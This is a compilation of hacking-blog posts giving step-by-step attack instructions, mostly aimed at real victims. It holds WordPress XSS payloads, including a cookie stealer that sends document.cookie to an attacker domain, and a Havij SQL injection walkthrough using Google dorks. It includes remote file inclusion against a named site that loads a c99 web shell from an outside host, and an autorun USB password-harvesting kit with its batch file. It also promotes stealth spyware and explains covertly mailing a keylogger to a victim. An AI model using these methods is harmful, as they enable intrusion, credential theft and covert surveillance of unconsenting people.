Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.

How does it work?

Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection

Popup “alert” Box
<script>alert(‘hungry-hackers.com’)</script>

Redirect to www.hungry-hackers.com
<script>document.location=”http://hungry-hackers.com”</script>

Cookie Stealer (need a logging system in place)
<script>document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com”</script>

Solution:

Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did

SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.

In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

• You can download havij from here.
• We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

• Just search google using one of the dork and you will see a lot of vulnerable websites.
• Open any one of the website than put  ‘ after the link look:

• If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.

  

• Now open Havij and paste the link without ‘

  

  

• Now we have to find the columns of the database.

  

  

• After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on Cracking MD5.

• After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.
• Now you may login as the admin user and control the website as you want.
• H@ppy H@cking

Video Tutorial

About The Author

Irfan Shakeel is an ethical hacker/penetration tester and he have found many bugs on the famous web server. He is the founder of Ethical Hacking Blog.

Xss Cross Site Scripting may be classified in two types:

1.Persistent XSS

2.Non Persistent XSS

In order to demonstrate a XSS attack I will take an example of a website:

http://www.redwrappings.co.in

Checking the venerability

The simplest way to check the vulnerability is to enter the following code in the any web form present on the website

<script>alert(“XSS”)</script>

Once the attacker inserts the code A dialog box like the below one will appear:

Defacement

Now the attacker has found that the website is velnerable to an xss attack the attacker can do lots of damages to the website, The most common thing which the attacker will do is place his defacement image on that page showing that the website is hacked, For this purpose he will insert a code similar to the below one:

<html><body><IMG SRC=”http://site.com/yourDefaceIMAGE.png”></body></html>

Where http://site.com/yourDefaceIMAGE.png is the defacement image

Inserting Flash Videos

The attacker can also insert flash videos by entering the following code in any web form present on the website

Redirection

The attacker can also redirect the page to any particular page , In case if the hacker has managed to find XSS venerability in the a website like paypal.com or alertpay.com he can redirect that page to a Phisher Site(Fake login page) where the victim will loose his password, To redirect a an xssed page to another page the attacker will insert a code similar to the below one:

<script>window.open( “http://www.google.com/” )</script>

Stealing Cookies

Most of the attackers after finding a website venerable to xss will probably steal victims cookies to gain access to their account or private data this method is called Session hijacking, which is a detailed topic and I will be explaining in the later articles

Hope you have learned some XSS ,Feel free to ask if you have any problem regarding the above information

About the Author

This is a guest post by Rafay baloch. Rafay Baloch is a the founder of Rafay Hacking Articles and the writer of the book A Beginners guide To Ethical Hacking

Sniper Spy

SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature. Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!

Features

• Remotely Deployable : It means you don’t need to have access of the system on which you need to install it.
• Invisibility Stealth Mode : It can work in invisible mode without the knowledge of the victim.
• Record Login Credentials : It can Records any Password for any Email account or login details of the victim on any website. This can give you access to the victims email or any other web account.

  

• Real Time Screen Viewer : You can see all the activities that is taking place on the victim’s PC.
• Remote Reboot/Shutdown : You can also remotely reboot or shutdown the PC or choose to logoff the current Windows user.
• Bypass Any Firewall : The best part of this software is that it can completely undetectable by any Firewall available till now.
• Actual Screenshots : Captures a full-size jpg picture of the active window however often you wish.
• Websites Visited : Records all website URLs visited in Internet Explorer and Firefox with page title.
• Keystrokes in Most Languages : Every keystroke typed into ANY window is logged, including passwords typed.
• PC Location Mapping : Logs the IP at each upload to show you physical locations of the PC on a map.
• Full Chat Conversations : Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.



• Applications Executed : Records every application executed by the user including full path and username.
• Application Session Durations : Shows you how long each application was used including start time and stop time.
• Automatic User File Uploads : Uploads an *actual copy* of every document, picture or desktop file changed.
• File / Folder Changes : Each time a file or folder changes, the software records the action and the full path.

Download

Click Here to buy this Amazing Software Right Now.

Click Here to go to the Official Website of this Software.

Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one

www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly  use the following Google Dork

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Lets say that the target website is http://www.cbspk.com

So the hacker url will become

http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

http://h1.ripway.com/rafaybaloch/c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?

Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it

About the Author

This is a guest post by Rafay baloch. Rafay Baloch is a the founder of Rafay Hacking Articles and the writer of the book A Beginners Guide To Ethical Hacking

Have you ever thought that a Simple USB Drive can be used as a Destructive Tool for Hacking Passwords? Today I will show you how to hack Passwords using an USB Pen Drive.

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places.

Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedure to create the password hacking toolkit.

NOTE: You must temporarily disable your Anti-Virus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad as autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad as launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC  or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista.

Disclaimer: I am not responsible for any kind of Damage caused by using the above information. The above Tutorial is only for recovering forgotten passwords.

The Oracle database is popular with large corporations and governments for recording large volumes of online transactions.

The hacking tool was developed in the open source Metasploit cooperative, which had hosted a seminar at the conference. According to the Metasploit website, students will learn how to create custom modules to solve specific tasks, launch widescale client-side attacks, operate a malicious wireless access point, generate custom backdoors, bypass intrusion prevention systems, and automate the post-exploitation process. The course shows how to use new features in the Metasploit softwre for penetration tests.

In February security researcher and Metasploit co-developer Chris Gates, who runs the Carnal0wnage website, showed how to attack Oracle using Metasploit. A video of the attack (below) was posted on the Toolbox for IT blogs.

Attacking Oracle with the Metasploit Framework Shmoocon Firetalk Demo Video from carnal0wnage on Vimeo.

Reuters reported that Oracle has released a patch that protects against Metasploit. However, many firms are lax about applying patches, opening their information to hackers.

Metasploit has created other tools to hack other software programs, including Microsoft Windows, Apple’s OSX, Linux and Posix operating systems, as well as the Firefox and Internet Explorer browsers and applications such as Office and Adobe’s PDF applications.

Meanwhile, Mandiant, another security firm, says it has developed a tool that can detect Metasploit attacks. It says Metasploit’s Meterpreter software lets developers write code in DLL files and execute everything in memory. This means nothing is written to disk where it might be detected.

Testers and hackers can use Meterpreter to download and upload files, execute code, and open its own command shell. The new tool can tell if Meterpreter is still in memory, and, if so, which files Meterpreter has accessed, and whether it has changed a registry key.

My aim is to divert your focus from applications to physical vulnerability.  The most vulnerable element of any system is its user. Its simple to break any one’s confidence by using his emotions.

Let me explain you with example: Some X person was very rich, confident successful & blah , blah, blah .. One day his child was kidnapped by some criminals & so as to threaten him. He asked police help, takes best in the business to let her child out of those creepy guys.

But why? Because he was scared , that something could happen to his child. His emotions are most vulnerable & that lets his success, confidence & money (we can call it as his shields) broke into pieces.

I am not asking you to kidnap someone, No way. Just telling you which is the vulnerabilities which cant be shielded. Even my emotions are also vulnerable.

Remember, machines can not be threatened, programs could not be vulnerable as  its user is.

Human reacts to things very rapidly if he thinks he is loosing his important thing. He quits thinking & searches for the quickest path to get out & You know what , all you wannabe hackers you have to place your exploit right between that path. He wish to go out, you have to think before he thinks about it. Plan, make a map & and plant.

Are you getting me ? or I am going too fast, Just remember – You have catch the things this fast to be a great intruder, or what you call it as a HACKER.

To guard against such vulnerabilities all the employees who are working on the network, are suppose to be trained with this thing, that you don’t have to react quickly.

You the network security administrator should train them for such attacks, show them how to get out of such situation of attacks. give them demonstration, tell them how to react with specific errors, how to react for system crash, tell them how to report a problem, give them a sort of First Aid Kit which can be easily understood & used by all vulnerable human beings in your organization. This is the only way to shield this vulnerability of emotions.

Otherwise this human being have this Emotional vulnerability which is far far beyond the scope of stealth, shield or security. . .

This post is made by Amol Wagh who blogs about Ethical Hacking & Exploits on Hackers Enigma Dot Com. You can Follow Amol on Twitter Here.

You have to collect some of the tools, Operating System & documentation on your PC with a very clear format.

Operating System:

Which OS to use, choice is all yours. Windows in all cases is not so ‘made for hacking’ according to me. Whatever XP,Vista or windows 7. They are all just OS which are made for novice public which can learn computers.

If you are a regular Linux user, Then shift to Backtrack Linux. It is Linux made for hacker geeks & completely embedded with all penetration testing tools in it. You can Download Backtrack here. But if you have never used Linux & wish to learn then you can use basic Linux distributions like Ubuntu. But remember that you or not supposed to learn Linux desktop environment like windows, you have to learn its shell or terminal. (command prompt of Linux)

As I said Choice is all yours you can go with Windows also. Its all on you.  (Suggestion: If you can’t make it habit to learn new things, you can never be a HACKER)

Hackers Toolkit:

In your root directory or C:/ in windows make a folder named Tools. So that you can access all tools from command prompt easily E.g.  c:/tools/example

Go surf for these tools enlisted.

• NMAP : Enumeration
• Nessus : Scanning & Enumeration
• Ethereal
• Snort  : Network Hacking
• Netcat
• TCPDump : For sniffing TCP Packets
• WinDump
• Hping2
• DSniff : Sniffing Data Packets
• GFI LANguard : LAN Security
• Ettercap
• Whisker/Libwhisker
• John the Ripper : Password Cracking Utility
• OpenSSH
• Sam Spade
• ISS Internet Scanner : Web Server Security
• Tripwire
• Nikto
• Kismet
• SuperScan : Another Great Scanner
• Cain & Abel
• SolarWinds Toolsets
• NTop
• Nemesis
• Honeyd
• Achilles
• Firewalk
• AVG Free Antivirus
• Trend Micro online scan
• Tiny Firewall
• Symantec Virus Tools
• Linux Security Audit Tool
• Firewall Builder
• IPCop
• AirSnort : Wireless Network Hacking
• SATAN
• Rootkit Hunter : To find out installed root kits.
• SpamAssassin
• grsecurity
• IP-Scanner : To scan IP Ranges

What are these tools ? Why are they used for ? How to use it ? are some of the questions that are striking your head.  Chill all dudes & babes, I am here to help you with each of the tools listed above.  All you have to do is first download them all & place in your root directory.

When ever you are reading things you must have all these tools, So I am giving you the list. And yes, Don’t forget to Subscribe to Hacking Truths, because you can’t miss such valuable updates. And yes, don’t worry about such big list, you won’t need to use all at a time, they are have wide uses in different fields like – Cracking, Wireless Networks hacking, Password Hacking, Encryption, Sniffing, Scanning & Enumeration, SQL injection & Web Hacking etc.

So have the tools, and go through their home pages & read as more as you can. For any sort of problems you have, I am just a comment away from you.

This post is made by Amol Wagh who blogs about Ethical Hacking & Exploits on Hackers Enigma Dot Com. You can Follow Amol on Twitter Here.

In my previous article “How To Write A Basic Keylogger In VB” I showed you how to write your own keylogger. Today I will show you how to install a Keylogger on a Remote PC without the knowledge of the owner and you will get all the keystroke information through Email.

Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article.

Now to install a Keylogger on a Remote Computer you have to follow the steps given below:

1. First of all download Winspy keylogger software from link given below:
   

   http://www.win-spy.com/

2. After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.
3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
5. Now, Winspy’s main screen will be displayed as shown in image below:
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
   

   User – type in the victim’s name
   File name – Name the file to be sent. Use the name such that victim will love to accept it.
   File icon – Keep it the same
   Picture – select the picture you want to apply to the keylogger.
   Email keylog to – Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.
   Thats it. This much is enough. If you want, can change other settings also.

8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.

So guys, I hope you have got the trick on how to hack any email account passwords from this article. If you have any comment or views about article, feel free to mention it in comments section.